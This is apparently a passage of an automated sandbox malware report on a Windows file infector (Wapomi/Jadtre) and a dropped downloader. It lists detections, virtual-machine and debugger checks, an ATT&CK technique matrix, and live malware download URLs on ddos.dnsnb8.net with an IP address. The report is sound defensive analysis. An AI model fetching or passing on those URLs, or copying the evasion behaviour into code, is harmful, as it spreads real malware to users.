    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-1045
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-17246
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeAPI coverage: 2.2 %
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00801718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00801754h2_2_00801718
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_009685E9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_009685E9
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_008029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_008029E2
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_00802B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00802B8C
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.2.drBinary or memory string: VMware
    Source: oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClass
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.2.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.2.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.2.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: oQmD.exe, 00000002.00000002.1843788615.0000000000683000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000003.1638844737.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.2.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.2.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.2.drBinary or memory string: vmci.sys
    Source: Amcache.hve.2.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.2.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.2.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.2.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.2.drBinary or memory string: VMware20,1
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.2.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.2.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.2.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.2.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.2.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.2.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.2.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.2.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeAPI call chain: ExitProcess graph end nodegraph_2-1020
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_0095CC11 LdrInitializeThunk,InitializeCriticalSectionAndSpinCount,0_2_0095CC11
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00958DFE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00958DFE
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_009FF044 mov eax, dword ptr fs:[00000030h]0_2_009FF044
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_009605AA mov ecx, dword ptr fs:[00000030h]0_2_009605AA
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00963E62 mov eax, dword ptr fs:[00000030h]0_2_00963E62
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00969720 GetProcessHeap,0_2_00969720
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00959015 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00959015
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00958DFE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00958DFE
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_0095CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0095CDE3
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00958F5A SetUnhandledExceptionFilter,0_2_00958F5A
    Source: SciTE.exe.2.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00958BF5 cpuid 0_2_00958BF5
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetLocaleInfoW,0_2_0096B99E
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0096BAC7
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetLocaleInfoW,0_2_0096BBCD
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0096BC9C
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetLocaleInfoW,0_2_00963C0B
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: EnumSystemLocalesW,0_2_0096B5DA
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: EnumSystemLocalesW,0_2_0096B6C0
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: EnumSystemLocalesW,0_2_009636E5
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: EnumSystemLocalesW,0_2_0096B625
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0096B74B
    Source: C:\Users\user\Desktop\1hdqYXYJkr.exeCode function: 0_2_00959212 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00959212
    Source: C:\Users\user\AppData\Local\Temp\oQmD.exeCode function: 2_2_0080139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,2_2_0080139F
    Source: Amcache.hve.2.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.2.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: oQmD.exe PID: 6316, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: oQmD.exe PID: 6316, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory141
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    1
    Access Token Manipulation
    Security Account Manager1
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Process Injection
    NTDS1
    Process Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information
    LSA Secrets3
    File and Directory Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
    Obfuscated Files or Information
    Cached Domain Credentials23
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
    Software Packing
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    1hdqYXYJkr.exe85%VirustotalBrowse
    1hdqYXYJkr.exe95%ReversingLabsWin32.Virus.Wapomi
    1hdqYXYJkr.exe100%AviraW32/Jadtre.B
    1hdqYXYJkr.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\oQmD.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\oQmD.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\oQmD.exe96%ReversingLabsWin32.Trojan.Madeba
    C:\Users\user\AppData\Local\Temp\oQmD.exe93%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    ddos.dnsnb8.net13%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.rftp.comJosiah0%URL Reputationsafe
    http://www.activestate.com0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://www.rftp.com0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar100%URL Reputationmalware
    http://www.baanboard.comBrendon0%URL Reputationsafe
    https://www.smartsharesystems.com/0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    https://www.smartsharesystems.com/Morten0%URL Reputationsafe
    http://www.develop.com0%URL Reputationsafe
    http://www.lua.org0%URL Reputationsafe
    http://ddos.dnsnb8.net/100%URL Reputationmalware
    http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
    http://www.spaceblue.com0%URL Reputationsafe
    http://www.baanboard.com0%URL Reputationsafe
    http://www.develop.comDeepak0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k2.raration100%Avira URL Cloudphishing
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rartS100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rar$=100%Avira URL Cloudmalware
    https://login.live.c0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarf=Q100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.raro100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rart100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rarI100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k1.rari100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rartS16%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k2.raro16%VirustotalBrowse
    http://ddos.dnsnb8.net/amData100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.raration16%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k2.rarAppData100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rart11%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k2.rarI10%VirustotalBrowse
    http://ddos.dnsnb8.net/-window-ext-l1-1-0.dll14%VirustotalBrowse
    http://ddos.dnsnb8.net:799/cj//k1.rari12%VirustotalBrowse
    http://ddos.dnsnb8.net/amData9%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalseunknown
    NameMaliciousAntivirus DetectionReputation
    http://ddos.dnsnb8.net:799/cj//k1.rartrue
    • URL Reputation: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://ddos.dnsnb8.net:799/cj//k2.rarationoQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://www.scintilla.org/scite.rngSciTE.exe.2.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rar$=oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    http://www.rftp.comJosiahSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.activestate.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.activestate.comHolgerSciTE.exe.2.drfalse
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rartSoQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEoQmD.exe, 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmp, oQmD.exe, 00000002.00000003.1632073114.0000000000AF0000.00000004.00001000.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
